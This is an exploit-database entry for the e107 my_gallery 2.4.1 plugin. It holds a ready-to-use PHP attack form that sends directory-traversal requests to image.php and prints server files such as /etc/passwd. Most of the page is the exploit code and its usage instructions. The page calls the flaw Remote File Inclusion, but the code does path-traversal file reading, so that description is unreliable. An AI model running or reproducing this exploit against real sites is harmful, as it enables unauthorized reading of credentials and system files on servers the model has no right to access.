e107 Plugin my_gallery 2.4.1 Exploit

vendor:

my_gallery

by:

NoGe & Vrs-hCk

9,3

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: my_gallery

Affected Version From: 2.4.1

Affected Version To: 2.4.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

e107 Plugin my_gallery 2.4.1 Exploit

e107 Plugin my_gallery 2.4.1 is vulnerable to a Remote File Inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually through a malicious URL, and execute it on the vulnerable server. This can lead to the attacker gaining access to sensitive information, such as passwords, or even full control of the server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. This can be done by using a whitelist of accepted inputs, or by using a blacklist of known malicious inputs.

Source

Exploit-DB raw data:

<?php

/*

============================================
[o] e107 Plugin my_gallery 2.4.1 Exploit [o]
============================================

Bug [f]ound by NoGe - noge.code@gmail.com
Exploit [c]oded by Vrs-hCk - d00r@telkom.net

* Plugin my_gallery create photo gallery.
* Powered by Highslide JS script.
* With random gallery menu and navigation menu.
* Has a comment system, ratings and search of images.

Download e107 my_gallery 2.4.1 Plugin
http://code.google.com/p/e107mygalleryplugin/downloads/list


=============
[o] Usage [o]
=============

Web 2 XPL << fill with site who use e107 Plugin my_gallery
File 2 Read << fill with file or directory you want to read

Web 2 XPL : www.contoh.com
File 2 Read : /etc/passwd

Then Go!!!


==============
[o] Greetz [o]
==============

MainHack BrotherHood [ http://news.serverisdown.org ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

FUCK TERORIS!!

*/

$vuln  = '/e107_plugins/my_gallery/image.php?file=';
$trasv = '/../../../../../../../../../../../../../../..';

echo "<form method=POST>
Web 2 XPL : <input type=\"text\" name=\"host\" size=30>
File 2 Read : <input type=\"text\" name=\"file\" size=30>
<input type=submit value=\"Go!!!\" name=\"_xpl\">
<br><br>";

if ($_POST['_xpl']) {
	$data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";
	$data .= "Host: {$host}\r\n";
	$data .= "Connection: close\r\n\r\n";
	$html  = sendpacket($host,$data);
	print '<pre>'.htmlspecialchars($html).'</pre>';
}

echo "</form>";

function sendpacket($host,$data) {
	if (!$sock = @fsockopen($host,80)) {
		die("[!] Connection refused, try again!\n");
	}
	fputs($sock,$data);
	while (!feof($sock)) { $html .= fgets($sock); }
	fclose($sock);
	return $html;
}

?>

# milw0rm.com [2009-07-23]